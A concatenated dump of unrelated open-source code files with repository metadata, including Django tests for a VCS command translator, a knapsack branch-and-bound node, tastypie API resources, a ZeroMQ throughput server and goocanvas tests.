        super(PostGameScreen, self).__init__(**kwargs)

    def quit(self):
        self.app.stop()
UTF-8
Python
false
false
2,013
5,755,256,190,723
74233936b35b5245456914f5ce1046c4cf1ddf5a
5af8120729ce2360469c42acc9214dc31e262a2a
/vcstranslator_project/apps/translator/tests.py
bb0d94ceff9712473784aca7442a689756198927
[ "BSD-2-Clause" ]
permissive
2215/vcs-translator
https://github.com/2215/vcs-translator
91ed6d11ba2852b6a9a4718e62e1e6bfa5aa2c53
ad4bce1f3515e2fe44f1a19d0a5960ea2ff8f6b9
refs/heads/master
2018-04-14T13:52:58.666694
2014-03-21T21:00:40
2014-03-21T21:00:40
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.test import TestCase from translator.forms import TranslationForm from translator.models import FailedTranslation from translator.utils import Translator class TranslationFormTests(TestCase): def test_clean_command(self): f = TranslationForm({"command": ""}) self.assertFalse(f.is_valid()) self.assertEqual(f.errors["command"], ["This field is required."]) f = TranslationForm({"command": "arch commit", "vcs": "git"}) self.assertFalse(f.is_valid()) self.assertEqual(f.errors["command"], ["Command must start with a valid VCS (bzr, git, hg, svn)."]) f = TranslationForm({"command": "svn commit", "vcs": "git"}) self.assertTrue(f.is_valid()) class TranslatorTests(TestCase): def assert_translates(self, translator, command, result): r = translator.translate(command) self.assertTrue(r.success) self.assertEqual(r.result, result) def assert_cant_handle_yet(self, translator, command): r = translator.translate(command) self.assertFalse(r.success) self.assertTrue(r.result.startswith("We can't handle this yet")) def assert_cant_handle(self, translator, command): r = translator.translate(command) self.assertFalse(r.success) self.assertEqual(r.result, "This VCS doesn't support this operation") def test_x_to_x(self): t = Translator("svn", "svn") self.assert_translates(t, "log", "svn log") def test_svn_to_git(self): t = Translator("svn", "git") self.assert_translates(t, "commit", "git commit -a && git push") self.assert_translates(t, "ci", "git commit -a && git push") self.assert_translates(t, "checkout", "git clone") self.assert_translates(t, "co", "git clone") self.assert_translates(t, "add", "git add") self.assert_translates(t, "add file.txt", "git add file.txt") self.assert_translates(t, "add some/other/file.txt", "git add some/other/file.txt") self.assert_translates(t, "update", "git pull") self.assert_translates(t, "status", "git status") self.assert_translates(t, "revert file.txt", "git checkout file.txt") self.assert_cant_handle(t, "") def test_git_to_svn(self): t = Translator("git", "svn") self.assert_translates(t, "pull", "svn up") self.assert_translates(t, "clone", "svn checkout") self.assert_translates(t, "status", "svn status") self.assert_translates(t, "diff", "svn diff") self.assert_translates(t, "log", "svn log") self.assert_cant_handle(t, "push") def test_hg_to_git(self): t = Translator("hg", "git") self.assert_translates(t, "pull", "git fetch") self.assert_translates(t, "commit", "git commit -a") self.assert_translates(t, "push", "git push") self.assert_translates(t, "diff", "git diff") self.assert_translates(t, "paths", "git remote -v") self.assert_translates(t, "record", "git add -p && git commit") self.assert_translates(t, "log", "git log --all") self.assert_translates(t, "", "git") def test_git_to_hg(self): t = Translator("git", "hg") self.assert_translates(t, "init", "hg init") self.assert_translates(t, "clone", "hg clone") self.assert_translates(t, "status", "hg status") self.assert_translates(t, "pull", "hg pull -u") self.assert_translates(t, "push", "hg push") self.assert_translates(t, "diff", "hg diff") self.assert_translates(t, "remote", "hg paths") self.assert_translates(t, "remote -v", "hg paths") self.assert_translates(t, "commit -a", "hg commit") self.assert_translates(t, "", "hg") self.assert_translates(t, "fetch", "hg pull") def test_svn_to_hg(self): t = Translator("svn", "hg") self.assert_translates(t, "commit", "hg commit && hg push") self.assert_translates(t, "checkout", "hg clone") self.assert_translates(t, "revert some/file.txt", "hg revert some/file.txt 
--no-backup") self.assert_translates(t, "update", "hg pull -u") self.assert_translates(t, "diff", "hg diff") self.assert_cant_handle(t, "") def test_hg_to_svn(self): t = Translator("hg", "svn") self.assert_translates(t, "diff", "svn diff") def test_git_to_bzr(self): t = Translator("git", "bzr") self.assert_translates(t, "init", "bzr init") self.assert_translates(t, "clone", "bzr branch") self.assert_translates(t, "status", "bzr status") self.assert_translates(t, "pull", "bzr pull") self.assert_translates(t, "push", "bzr push") self.assert_translates(t, "diff", "bzr diff") def test_bzr_to_git(self): t = Translator("bzr", "git") self.assert_translates(t, "pull", "git fetch") self.assert_translates(t, "commit", "git commit -a") self.assert_translates(t, "push", "git push") def test_hg_to_bzr(self): t = Translator("hg", "bzr") self.assert_translates(t, "init", "bzr init") self.assert_translates(t, "clone", "bzr branch") self.assert_translates(t, "status", "bzr status") self.assert_translates(t, "push", "bzr push") self.assert_translates(t, "diff", "bzr diff") def test_svn_to_bzr(self): t = Translator("svn", "bzr") self.assert_cant_handle(t, "") def test_cant_handle_yet(self): t = Translator("svn", "git") self.assert_cant_handle_yet(t, "commit some/file") f = FailedTranslation.objects.get() self.assertEqual(f.source, "svn") self.assertEqual(f.target, "git") self.assertEqual(f.command, "commit some/file") self.assertEqual(f.count, 1) self.assert_cant_handle_yet(t, "commit some/file") f = FailedTranslation.objects.get() self.assertEqual(f.count, 2) t = Translator("git", "svn") self.assert_cant_handle_yet(t, "commit -a") t = Translator("svn", "hg") self.assert_cant_handle_yet(t, "commit -a")
UTF-8
Python
false
false
2,014
16,071,767,638,360
87aedfbb540d6a04cf2a7b37917c0011af5b4cce
1965a9e618ab227a9adfad46b49fb577a29a808a
/src/cmaplc/mgr/assign.py
fba2de516a8ccd60f3ed464437aef2908fbaebde
[]
no_license
lpgray/cmaplc
https://github.com/lpgray/cmaplc
9bc502215cf29702d7c2de594750739a68b4e64f
1abf846d6c108b27e0251147e31a369b807c5711
refs/heads/master
2016-03-31T03:34:13.960993
2013-06-24T03:36:40
2013-06-24T03:36:40
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from cmaplc.entity import models
from cmaplc.utils import datetime_util


def update_assign_status(orderNbr, statusId, deliverer=None, failureReason=None):
    statusVo = models.AssignStatusVo.objects.get(pk=statusId)
    if statusId == 2:
        return assign_order(orderNbr, statusVo, deliverer)
    elif statusId == 1:
        return cancel_order(orderNbr, statusVo)
    elif statusId == 3:
        return success_order(orderNbr, statusVo)
    elif statusId == 4:
        return failure_order(orderNbr, statusVo, failureReason)


def assign_order(orderNbr, statusVo, deliverer):
    order = models.OrderInfoVo.objects.get(pk=orderNbr)
    order.setAssignStatusVo(statusVo)
    order.setAssignTime(datetime_util.get_now_minute_str())
    order.setDeliverer(deliverer)
    order.save()
    return order


def cancel_order(orderNbr, statusVo):
    order = models.OrderInfoVo.objects.get(pk=orderNbr)
    order.setAssignStatusVo(statusVo)
    order.setAssignTime(None)
    order.setDeliverer(None)
    order.save()
    return order


def success_order(orderNbr, statusVo):
    order = models.OrderInfoVo.objects.get(pk=orderNbr)
    order.setAssignStatusVo(statusVo)
    order.setSuccessTime(datetime_util.get_now_minute_str())
    order.save()
    return order


def failure_order(orderNbr, statusVo, failureReason):
    order = models.OrderInfoVo.objects.get(pk=orderNbr)
    order.setAssignStatusVo(statusVo)
    failureReasonVo = models.FailureReasonVo.objects.create(desc=failureReason)
    order.setFailureInfoVo(failureReasonVo)
    order.save()
    return order
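Illustrative call sites for update_assign_status (not from the repo); the order number, deliverer, and failure reason are placeholders, and the status ids follow the branches above: 1 = cancel, 2 = assign, 3 = success, 4 = failure.

# Sketch only; values are invented.
update_assign_status(1001, 2, deliverer="courier-07")               # assign an order
update_assign_status(1001, 4, failureReason="address not found")    # mark it failed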
UTF-8
Python
false
false
2,013
4,595,615,022,425
447329e5662f35b2bf9cb02e15bfe93afe677c1c
73c45259547df7961285a034a701e3a3986fe0f2
/main.py
cc8f85bea21b7247ba9a98d038e99abe26900062
[]
no_license
mrnoodles/Framework
https://github.com/mrnoodles/Framework
1f514efd5f77f684979f9efaabd004e69f2ee6fb
b99d4d05cd3b4935fb52997cf4a4c098c9ce6f16
refs/heads/master
2016-09-11T06:25:21.166346
2014-11-13T18:54:48
2014-11-13T18:54:48
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
__author__ = 'Andres'

import pygame
import setup
import keyboard
import random
import math
import physics

pygame.init()


def main():
    model()
    view()
    controller()
    setup.CLOCK.tick(setup.FPS)
    pass


def model():
    pass


def view():
    pass


def controller():
    pass
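The file defines per-frame stubs but nothing ever calls main(); a minimal sketch (not from the repo, window size assumed) of how such a per-frame function is typically driven with pygame.

# Sketch only: the 800x600 resolution and this loop are assumptions, not part
# of the original framework.
if __name__ == '__main__':
    screen = pygame.display.set_mode((800, 600))   # assumed resolution
    running = True
    while running:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
        main()                      # model / view / controller for one frame
        pygame.display.flip()       # present whatever view() drew
    pygame.quit()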
UTF-8
Python
false
false
2,014
11,287,174,101,324
02cb7ddda61600059f1a98e56bba7e159bd1d8e6
c0a8023248de6b97fb1568a12ea15126df564b11
/tests/zmq_server.py
c905b515095b6a9192c506c51e4561c743936741
[]
no_license
bwhite/hadoopy_rt
https://github.com/bwhite/hadoopy_rt
17977ebac9c393a18a665a7d62a05891dcc67697
bf651062002e3ce67edea7116b5f181835843a7f
refs/heads/master
2021-01-19T16:32:46.859061
2012-10-23T17:58:39
2012-10-23T17:58:39
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import zmq
import time
import os
import hadoopy_rt

print('PID[%s]' % os.getpid())
ctx = zmq.Context()
in_sock = ctx.socket(zmq.PULL)
in_sock.bind("tcp://127.0.0.1:3001")
prev_count = -1
st = time.time()
tcount = 0
while True:
    k, v = in_sock.recv_pyobj()
    tcount += 1
    v['server_time'] = time.time()
    t0 = v['worker_time'] - v['client_time']
    t1 = v['server_time'] - v['worker_time']
    t2 = v['server_time'] - v['client_time']
    if v['count'] - 1 != prev_count:
        print('Mismatch count!')
    prev_count = v['count']
    if time.time() - st >= 5:
        print('Throughput [%f]' % (tcount / (time.time() - st)))
        print((t0, t1, t2))
        st = time.time()
        tcount = 0
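A possible sending side for this throughput test (not in the repo); in the real setup a separate worker presumably stamps 'worker_time', so here both timestamps come from one process purely so the server's latency arithmetic still works.

# Sketch of a matching PUSH client; the payload keys mirror what the server
# reads ('client_time', 'worker_time', 'count'), the key string is arbitrary.
import zmq
import time

ctx = zmq.Context()
out_sock = ctx.socket(zmq.PUSH)
out_sock.connect("tcp://127.0.0.1:3001")

count = 0
while True:
    now = time.time()
    out_sock.send_pyobj(('key', {'client_time': now,
                                 'worker_time': now,
                                 'count': count}))
    count += 1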
UTF-8
Python
false
false
2,012
6,193,342,847,876
270635681733f35043d7965eeb3f921644f6957b
1e5a87dfe30f5525abfbdf98c8ca676781d14d51
/python/hackerrank/oj6textjustification.py
634fc3c4223bc7a9eac06af2a4de97a0f0d8ec2f
[]
no_license
panuinth/interview
https://github.com/panuinth/interview
c0915fffbcc4c53334f09fbce798b1f7569c5c79
3478eccbc5261b86fbf4080b2e2cbf709bda9c22
refs/heads/master
2021-01-25T03:48:53.447859
2014-08-22T03:31:40
2014-08-22T03:31:40
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
"""words: ["This", "is", "an", "example", "of", "text", "justification."] L: 16. Return the formatted lines as: [ "This is an", "example of text", "justification. " ] """ class Solution: # @param words, a list of strings # @param L, an integer # @return a list of strings def fullJustify(self, words, L):
UTF-8
Python
false
false
2,014
12,979,391,170,866
86b63058321774c48ff3ad0bccd444146b384431
bd39cff419a85267243d9cf7ed63aef6245b85b3
/newsdb/publications/models.py
c31dd4008d5b78db3eaf5bc44c3811034a5614a7
[]
no_license
ryanmark/newsdb
https://github.com/ryanmark/newsdb
236f6252957aa9818def5bc6796d537310acd1df
8b03301ec9317f2857594e55e1a5f2a98422108a
refs/heads/master
2020-04-26T17:27:02.757592
2013-10-26T21:13:15
2013-10-26T21:13:15
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.db import models
from django.contrib.sites.models import Site

from newsdb.models import SluggedModel
from metamodel.models import ModelMeta


class Publication(SluggedModel):
    name = models.CharField(max_length=100)
    sites = models.ManyToManyField(Site)

    def __unicode__(self):
        return unicode(self.name)


class PublicationMeta(ModelMeta):
    publication = models.ForeignKey(Publication, related_name='meta')

    class Meta:
        verbose_name = "product meta-data"
        verbose_name_plural = "product meta-data"
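A hypothetical shell-session sketch of these models in use; it assumes a Site row already exists and that SluggedModel supplies whatever slug handling Publication needs.

# Illustrative only; the publication name is made up.
pub = Publication.objects.create(name="Example Daily")
pub.sites.add(Site.objects.get_current())
print pub.meta.all()   # PublicationMeta rows via related_name='meta'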
UTF-8
Python
false
false
2,013
6,640,019,447,864
deae54888ee1511a0a3df1bd06c85a2367eaf180
b031af0bcbcffdb0f8e645e0173d70a11c6a4c8c
/map_editor/api_2/models.py
bb9e229f7cff36709eb48b537af9220927d4ed18
[]
no_license
mnopi/Labelee_src
https://github.com/mnopi/Labelee_src
aa45f7a420b499a23b444d0bede6af08799614df
8966bf1c5a5a38f76750d1aff48defc4dcd5d7fb
refs/heads/master
2022-08-24T01:41:53.424443
2013-12-16T15:06:15
2013-12-16T15:06:15
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*- from django.shortcuts import render_to_response, get_object_or_404 from django.template.loader import get_template from django.template import Context from django.template import RequestContext from django.http import HttpResponse from django.http import HttpRequest from django.http import HttpResponseRedirect from django.core.files.base import ContentFile from utils.helpers import responseJSON import json import simplejson from map_editor.models import * from map_editor.forms import * from utils import * def place(request, operation): """ Recibe una URL /map-editor/places/[operation], la cual puede ser: * new -> añade un nuevo lugar en la BD * delete -> elimina lugar de la BD """ # return HttpResponse('index view..') # matadero = Enclosure(name='Matadero') # matadero.save() if operation == 'new': form = EnclosureForm({'name': request.POST['place_name']}) if form.is_valid(): place = form.save() # print place.id return responseJSON(data={'id': place.id}) else: return responseJSON(errors=form.errors) elif operation == 'delete': place = Enclosure.objects.get(id=request.POST['place_id']) # eliminamos todos los mapas relativos a ese lugar, incluídas sus imágenes maps = place.map_set.all() for map in maps: map.delete() place.delete() return responseJSON() elif not operation: places = Enclosure.get_all() return HttpResponse(json.dumps(places), content_type="application/json") return HttpResponse('places..') def map(request, operation): if operation == 'new': # Si la petición es AJAX creo un mapa sin imágen if request.is_ajax(): map_name = request.POST['map_name'] form = FloorForm({'name': map_name}) if form.is_valid: place = Enclosure.objects.get(id=request.POST['place_id']) map = Floor(name=map_name, place=place) map.add_default_img() map.save() print map.name print map.place return responseJSON(data={'map_id': map.id}) else: return responseJSON(errors=form.errors) # Si no es AJAX es que quiero subir la imágen para el mapa guardado previamente else: file_content = ContentFile(request.FILES['map_img'].read()) print '@@@@ - ' + request.FILES['map_img'].name map.img.save(request.FILES['map_img'].name, file_content) map.save() return HttpResponse('uploaded!') else: return HttpResponse('ande vaaa') def objectType(request, operation): if operation == 'new': # Si la petición es AJAX creo un mapa sin imágen if request.is_ajax(): map_name = request.POST['map_name'] form = FloorForm({'name': map_name}) if form.is_valid: place = Enclosure.objects.get(id=request.POST['place_id']) map = Floor(name=map_name, place=place) map.add_default_img() map.save() print map.name print map.place return responseJSON(data={'map_id': map.id}) else: return responseJSON(errors=form.errors) # Si no es AJAX es que quiero subir la imágen para el mapa guardado previamente else: file_content = ContentFile(request.FILES['map_img'].read()) print '@@@@ - ' + request.FILES['map_img'].name map.img.save(request.FILES['map_img'].name, file_content) map.save() return HttpResponse('uploaded!') else: return HttpResponse('ande vaaa') def object(request, operation): if operation == 'new': # Si la petición es AJAX creo un mapa sin imágen if request.is_ajax(): map_name = request.POST['map_name'] form = FloorForm({'name': map_name}) if form.is_valid: place = Enclosure.objects.get(id=request.POST['place_id']) map = Floor(name=map_name, place=place) map.add_default_img() map.save() print map.name print map.place return responseJSON(data={'map_id': map.id}) else: return responseJSON(errors=form.errors) # Si no es AJAX es que 
quiero subir la imágen para el mapa guardado previamente else: file_content = ContentFile(request.FILES['map_img'].read()) print '@@@@ - ' + request.FILES['map_img'].name map.img.save(request.FILES['map_img'].name, file_content) map.save() return HttpResponse('uploaded!') else: return HttpResponse('ande vaaa') def dynamic_validator(request, resource, pk=None): """ Devuelve de manera dinámica (cada vez que se pulsa una tecla, etc..) los errores en cada campo del formulario. URI: /dynamyc-validator/[resource]/[id] Importante: cuando llamamos a este URI usando $http de angular el contenido está en 'request.body', en lugar de 'request.POST['data'] Por ejemplo para /dynamyc-validator/place recibimos: {'name': 'nombre del lugar'} Si el lugar se está editando recibimos su id por la URI: /dynamyc-validator/place/25 Si se le pasa una pk como argumento entonces excluimos los nombres de aquellos lugares que coincidan con esa misma pk Es importante que al pasar el objeto 'obj' a EnclosureForm éste tenga en sus claves (keys) los mismos nombres que para los atributos del modelo Enclosure (creado en models.py). Al caso, si se trata del nombre del lugar, que sea la clave también sea 'name:' """ obj = simplejson.loads(request.body) if pk: place = get_object_or_404(Enclosure, pk=pk) form = EnclosureForm(obj, instance=place) else: form = EnclosureForm(obj) # # obj['pk'] = pk # # print obj # others = Enclosure.objects.filter(name=obj['name']).exclude(pk=pk) # # others = Enclosure.objects.filter(name=obj['name']) # # others = Enclosure.objects.filter(name=obj['name']).exclude(name='matadero') # # print others # form.fields['name'].queryset = others if not form.is_valid(): return responseJSON(errors=form.errors) return responseJSON()
UTF-8
Python
false
false
2,013
300,647,726,155
0231d223a4a6abb36b9f5cc65b59e329a9869d7e
302dd9452543000e05f01af1662679aebb93ffe1
/apps/listings/api/resources.py
0e1495ceba19ea3ea9294a75cf1b22ed7e69941d
[]
no_license
defrex/hipsell-server
https://github.com/defrex/hipsell-server
617182e7c3f28ebb55b49af7b02b6a66bbd710aa
98ac178d98e00416afba38ba78012302c3bee36c
refs/heads/master
2021-01-20T10:42:11.784498
2011-04-27T15:16:43
2011-04-27T15:16:43
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.contrib.auth.models import User from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned, ValidationError from django.db.models import Max from tastypie import fields from tastypie.authentication import Authentication, BasicAuthentication from tastypie.authorization import Authorization, DjangoAuthorization from tastypie.http import HttpCreated from tastypie.resources import Resource, ModelResource from tastypie.utils import dict_strip_unicode_keys from tastypie.validation import FormValidation from listings.api.authentication import TokenAuthentication from listings.api.fields import Base64FileField from listings.forms import UserForm from listings.models import Listing, Offer, Profile, Comment, Question class UserResource(ModelResource): class Meta: queryset = User.objects.all() resource_name = 'user' allowed_methods = ['post',] authentication = Authentication() authorization = Authorization() fields = ['username', 'token',] validation = FormValidation(form_class=UserForm) def dehydrate(self, bundle): bundle.data['token'] = bundle.obj.profile.token return bundle def post_list(self, request, **kwargs): deserialized = self.deserialize( request, request.raw_post_data, format=request.META.get('CONTENT_TYPE', 'application/json')) bundle = self.build_bundle(data=dict_strip_unicode_keys(deserialized)) self.is_valid(bundle, request) updated_bundle = self.obj_create(bundle, request=request) resp = self.create_response(request, self.full_dehydrate(updated_bundle.obj)) resp["location"] = self.get_resource_uri(updated_bundle) resp.status_code = 201 return resp class ListingResource(ModelResource): photo = Base64FileField('photo') user = fields.ForeignKey(UserResource, 'user') offers = fields.ToManyField('listings.api.resources.OfferResource', 'offer_set', full=True, null=True) class Meta: queryset = Listing.objects.all() resource_name = 'listing' allowed_methods = ['get', 'post',] authentication = TokenAuthentication() authorization = DjangoAuthorization() def dehydrate(self, bundle): offers = bundle.data['offers'] bundle.data['best_offer'] = offers[0] if offers else None del bundle.data['offers'] return bundle def obj_create(self, bundle, request=None, **kwargs): bundle.data['user'] = UserResource().get_resource_uri(request.user) return super(ListingResource, self).obj_create(bundle, request, **kwargs) def is_authenticated(self, request, **kwargs): if request.method == 'GET': return True else: return super(ListingResource, self).is_authenticated(request, **kwargs) class OfferResource(ModelResource): user = fields.ForeignKey(UserResource, 'user') listing = fields.ForeignKey(ListingResource, 'listing') class Meta: queryset = Offer.objects.all() resource_name = 'offer' authentication = TokenAuthentication() authorization = DjangoAuthorization() class CommentResource(ModelResource): user = fields.ForeignKey(UserResource, 'user') offer = fields.ForeignKey(OfferResource, 'offer') class Meta: queryset = Comment.objects.all() resource_name = 'comment' authentication = TokenAuthentication() authorization = DjangoAuthorization() class QuestionResource(ModelResource): user = fields.ForeignKey(UserResource, 'user') listing = fields.ForeignKey(ListingResource, 'listing') class Meta: queryset = Question.objects.all() resource_name = 'question' authentication = TokenAuthentication() authorization = DjangoAuthorization()
UTF-8
Python
false
false
2,011
481,036,373,802
8db7b7266c4ee15d22216d3469cb44b226ff29b3
6a6e37c23e90208588655865f7ad26745804f404
/image_filer/forms.py
a63b30dcba3b364c5c2a419f5fec2acadb2b8b47
[ "MIT" ]
permissive
salvaorenick/django-image-filer
https://github.com/salvaorenick/django-image-filer
0bc20859f4bc09284cad3a41c5e598655da124d0
451898ec1b9508a5f5c1f7feaabfe84191ad73ac
refs/heads/master
2021-01-18T09:49:43.246053
2010-12-10T20:38:29
2010-12-10T20:38:29
1,157,163
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.forms.models import ModelForm
from image_filer.models import ImagePublication
from django import forms
from django.contrib.admin.widgets import ForeignKeyRawIdWidget


# Not Used
class ImagePublicationForm(ModelForm):
    image = ForeignKeyRawIdWidget('Image')

    class Meta:
        model = ImagePublication
        exclude = ('page', 'position', 'placeholder', 'language', 'plugin_type')

    def __init__(self, *args, **kwargs):
        #print "test: ", ImagePublication.image.rel
        return super(ImagePublicationForm, self).__init__(*args, **kwargs)
        #self.fields['image'].widget = ForeignKeyRawIdWidget('Image')
UTF-8
Python
false
false
2,010
6,743,098,678,961
9ab1b5c97b3274e20b21ec3ed3b86f386698d7a0
7347ce181cdfc10ea491fc4aa9120e9cec73423b
/tests/test_ellipse_item.py
ba1c325b3bda52accdec84f7105cdcf834fc6a16
[ "LGPL-2.0-only" ]
non_permissive
GNOME/pygoocanvas
https://github.com/GNOME/pygoocanvas
23e12c5c559dc3bbf53ea6a5906f32cff9dad534
d773d9d305bfe7e29805c78f2349ff9a2b418067
refs/heads/master
2018-12-28T05:02:56.063440
2010-11-11T13:30:17
2010-11-11T13:30:17
4,579,676
6
2
null
false
2017-02-13T00:06:10
2012-06-07T00:43:38
2016-12-05T11:12:22
2017-02-12T03:52:03
1,044
5
1
0
Python
null
null
import goocanvas
import cairo
import unittest
import pango
import gtk


class TestEllipse(unittest.TestCase):
    def make_ellipse_item(self, **kwargs):
        item = goocanvas.Ellipse(**kwargs)
        return item

    ''' Test goocanvas.Ellipse properties '''

    def test_ellipse_radius_x_property(self):
        item = self.make_ellipse_item(radius_x=100)
        self.failUnlessEqual(item.props.radius_x, 100.0)
        item.props.radius_x = 200
        self.failUnlessEqual(item.props.radius_x, 200.0)

    def test_ellipse_radius_y_property(self):
        item = self.make_ellipse_item(radius_y=100)
        self.failUnlessEqual(item.props.radius_y, 100.0)
        item.props.radius_y = 200
        self.failUnlessEqual(item.props.radius_y, 200.0)

    def test_ellipse_center_x_property(self):
        item = self.make_ellipse_item(center_x=100)
        self.failUnlessEqual(item.props.center_x, 100.0)
        item.props.center_x = 200
        self.failUnlessEqual(item.props.center_x, 200.0)

    def test_ellipse_center_y_property(self):
        item = self.make_ellipse_item(center_y=100)
        self.failUnlessEqual(item.props.center_y, 100.0)
        item.props.center_y = 200
        self.failUnlessEqual(item.props.center_y, 200.0)
UTF-8
Python
false
false
2,010
987,842,479,534
099678d6c8c07f6960c6257474a44a5bc2e862b8
21d1c7c294fd3ef165e1a03892f0736b5b800b95
/dbmail/__init__.py
b150b672c51ca8b48e693c5dd73efb7d042b3d29
[ "GPL-2.0-only" ]
non_permissive
maximzxc/django-db-mailer
https://github.com/maximzxc/django-db-mailer
9184da96fb8015b621347da7203bf0911713b2d8
0047d155954c5321c45b64c0479e66acc309a079
refs/heads/master
2021-01-21T02:57:12.431723
2014-09-25T14:59:08
2014-09-25T14:59:08
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from datetime import datetime

VERSION = (2, 0, 'b')


def get_version():
    return '.'.join(map(str, VERSION))


def app_installed(app):
    from django.conf import settings

    return app in settings.INSTALLED_APPS


def celery_supported():
    try:
        import tasks

        if not app_installed('djcelery'):
            raise ImportError
        return True
    except ImportError:
        return False


def send_db_mail(slug, recipient, *args, **kwargs):
    from dbmail.defaults import CELERY_QUEUE, SEND_MAX_TIME
    from dbmail.models import MailTemplate
    from dbmail.send_mail import SendMail

    args = (slug, recipient) + args
    send_after = kwargs.pop('send_after', None)
    send_at_date = kwargs.pop('send_at_date', None)
    use_celery = kwargs.pop('use_celery', True)

    if celery_supported() and use_celery:
        import tasks

        template = MailTemplate.get_template(slug=slug)
        max_retries = kwargs.get('max_retries', None)
        if max_retries is None and template.num_of_retries:
            kwargs['max_retries'] = template.num_of_retries

        options = {
            'args': args, 'kwargs': kwargs,
            'queue': kwargs.pop('queue', CELERY_QUEUE),
            'time_limit': kwargs.get('time_limit', SEND_MAX_TIME),
            'priority': template.priority,
        }
        if send_at_date is not None and isinstance(send_at_date, datetime):
            options.update({'eta': send_at_date})
        if send_after is not None:
            options.update({'countdown': send_after})
        return tasks.send_db_mail.apply_async(**options)
    else:
        return SendMail(*args, **kwargs).send()
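A hypothetical call sketch for send_db_mail (not part of the package): the 'welcome' slug and the address are invented; use_celery=False forces the synchronous SendMail path, while send_after is forwarded to Celery as a countdown when Celery is available.

# Hypothetical usage of send_db_mail; slug and recipient are invented.
from dbmail import send_db_mail

# Synchronous path (also taken automatically when Celery is unavailable):
send_db_mail('welcome', 'user@example.com', use_celery=False)

# With djcelery installed, extra options are forwarded to apply_async:
send_db_mail('welcome', 'user@example.com', send_after=60)  # countdown in seconds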
UTF-8
Python
false
false
2,014
9,964,324,146,653
d4a463143b0e6571045971920dc3c9c3be18c66b
99c450ae27e36ebc7ce50d4f60523e20df31e38a
/discrete_opt_2014/discrete_opt_course/hw1/branchAndBoundNode.py
b44e6df717632a181b9c8addbbc9afe97a0577db
[]
no_license
ronin2448/coursera_courses
https://github.com/ronin2448/coursera_courses
d0447a3824d202c09f53c56a07bfab672f3e4b7f
0e4d477104959bb77e88500f891fa8f55a4abfbe
refs/heads/master
2020-05-19T19:07:51.447670
2014-04-09T04:51:27
2014-04-09T04:51:27
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
''' Created on Apr 8, 2014 @author: domingolara ''' from collections import namedtuple class Decision(object): def __init__(self, item, decision): self.item = item self.decision = decision class ProblemNode(object): ''' classdocs ''' def __init__(self, previouslyDecidedItems, pendingItemDecisions, parentNode): ''' Constructor ''' self.previouslyDecidedItems = previouslyDecidedItems self.parent = parentNode self.isFeasible = True self.pendingItemDecisions = pendingItemDecisions self.leftChildNode = None self.rightChildNode = None def labelAsInFeasible(self): self.isFeasible = False def isSolutionFeasible(self): return self.isFeasible def isLeafNode(self): if( len(self.pendingItemDecisions)==0): return True else: return False def getLeftChildNode(self): if( self.isLeafNode() ): self.leftChildNode = None else: childsPendingDecisions = list(self.pendingItemDecisions) takeIt = Decision(childsPendingDecisions.pop(),1) itemsInSackAfterTakingIt = list(self.previouslyDecidedItems) itemsInSackAfterTakingIt.append(takeIt) self.leftChildNode = ProblemNode(itemsInSackAfterTakingIt, childsPendingDecisions , self) return self.leftChildNode def getRightChildNode(self): if( self.isLeafNode() ): self.rightChildNode = None else: childsPendingDecisions = list(self.pendingItemDecisions) dontTakeIt = Decision(childsPendingDecisions.pop(),0) itemsInSackAfterNoTTakingIt = list(self.previouslyDecidedItems) itemsInSackAfterNoTTakingIt.append(dontTakeIt) self.rightChildNode = ProblemNode(itemsInSackAfterNoTTakingIt, childsPendingDecisions , self) return self.rightChildNode def showKnapSack(self): size = len(self.pendingItemDecisions) + len(self.previouslyDecidedItems) knapSack = [] for i in range(0,size): knapSack.append(0) for d in self.previouslyDecidedItems: knapSack[d.item.index] = d.decision outStr = "" for i in range(0,size): outStr += " "+ str(knapSack[i]) return outStr.strip() def getOptimisticEstimate(self, capacity): curVal = self.getCurrentKnapSackValue() curWgt = self.getCurrentKnapSackWeight() sortedItemList = sorted(list(self.pendingItemDecisions), key= lambda x : ((x.value*1.0)/x.weight)*1.0, reverse=True) if(len(sortedItemList) == 0): return curVal while curWgt < capacity: if(len(sortedItemList) == 0 ): break nextItem = sortedItemList.pop(0) wgtIncrease = nextItem.weight if((curWgt + wgtIncrease) < capacity ): curVal += nextItem.value curWgt += wgtIncrease else: amtToTake = ((capacity - curWgt)*1.0)/(wgtIncrease*1.0) curVal += amtToTake*nextItem.value curWgt = capacity return curVal; def getCurrentKnapSackValue(self): val = 0 for d in self.previouslyDecidedItems: val += d.decision*d.item.value return val def getCurrentKnapSackWeight(self): wgt = 0 for d in self.previouslyDecidedItems: wgt += d.decision*d.item.weight return wgt
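The module imports namedtuple but never defines an item type, so the sketch below assumes an Item namedtuple with the index, value and weight fields the node code actually reads; the item data is invented.

# Driving ProblemNode by hand (Item and the sample data are assumptions).
from collections import namedtuple

Item = namedtuple('Item', ['index', 'value', 'weight'])
items = [Item(0, 8, 4), Item(1, 10, 5), Item(2, 15, 8)]

root = ProblemNode(previouslyDecidedItems=[], pendingItemDecisions=items, parentNode=None)
left = root.getLeftChildNode()    # decides to take items[-1] (pop() from the pending list)
right = root.getRightChildNode()  # decides to skip that same item

print(left.getCurrentKnapSackValue())           # 15
print(left.getCurrentKnapSackWeight())          # 8
print(left.showKnapSack())                      # 0 0 1
print(root.getOptimisticEstimate(capacity=11))  # fractional (linear relaxation) bound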
UTF-8
Python
false
false
2,014
609,885,399,316
82a52767d122eb8eae9b6fc44b9c081d88f4d73a
5106e69da58c288f8c4b7a7304a2661d8e144e06
/passwords/models.py
20b84a0e86a186915cec9353cdb6914980210092
[]
no_license
gavinwahl/safe-deposit-box
https://github.com/gavinwahl/safe-deposit-box
cab312656cbe953f0475255b190a8b52010e3fde
a06c97c3fe29d2d57f5960d7f37229d3ff9b9a24
refs/heads/master
2021-01-01T15:36:17.966520
2011-09-24T22:53:09
